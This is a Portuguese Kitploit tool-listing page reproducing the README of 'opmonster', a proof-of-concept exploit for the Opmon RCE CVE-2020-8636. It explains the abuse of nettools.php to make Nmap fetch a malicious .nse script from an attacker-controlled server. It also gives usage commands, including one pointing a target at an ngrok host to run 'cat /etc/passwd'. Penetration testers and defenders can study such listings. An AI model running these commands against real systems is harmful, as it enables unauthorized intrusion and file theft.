Skip to content
KitploitKITPLOIT
FerramentasExploitsBlog
Log in
Enviar
FerramentasExploitsBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
opmonster — Exploit de execução remota de código autenticada para Opmon CVE-2020-8636 | Kitploit
Ferramentas/GitHubGitHub/phor3nsic/opmonster
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoRed TeamingFerramenta de Acesso Remoto
GitHubphor3nsic/opmonster

opmonster

Exploit de execução remota de código autenticada para Opmon CVE-2020-8636

Ver Repositório
28há 3 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

OpMonster

CVE-2020-8636 — exploit de execução remota de código autenticada para Opmon

Sobre • Instalação • Uso • Licença

language last commit license stars

OpMonster

Sobre

O OpMonster é um exploit de prova de conceito para CVE-2020-8636, uma vulnerabilidade de execução remota de código na plataforma de monitoramento Opmon. Ele abusa do endpoint nettools.php, que permite executar o Nmap com opções --script arbitrárias. O exploit faz o Opmon buscar um script .nse malicioso do Nmap em um servidor que você controla (via http-fetch), coloca-o em /tmp e o executa para rodar seu comando no alvo, exibindo a saída.

Descoberto e desenvolvido por @phor3nsic. Mais detalhes: Três CVEs no Opmon.

Instalação

git clone https://github.com/phor3nsic/opmonster
cd opmonster
pip install requests

Uso

Primeiro, inicie um servidor web em um host que o alvo consiga acessar, em um diretório de onde o script .nse gerado possa ser baixado (o exploit grava o script no diretório atual):

php -S 0.0.0.0:1337

Em seguida, execute o exploit com quatro argumentos posicionais:

python3 opmonster.py https://vulnhost.com myhost.ngrok.io 80 "cat /etc/passwd"
ArgumentoDescrição
HOSTURL base do Opmon de destino (ex.: https://vulnhost.com)
LHOSTHost do seu servidor que serve o script .nse
LPORTPorta do seu servidor
CMDComando a ser executado no alvo

O exploit aborta com uma mensagem se o alvo não baixar o script ("not vulnerable") ou não conseguir fazer uma conexão de saída para o seu servidor.

Aviso

Apenas para testes de segurança autorizados e fins educacionais. Você é responsável pelo uso que fizer.

Licença

MIT © phor3nsic

Baixar ferramenta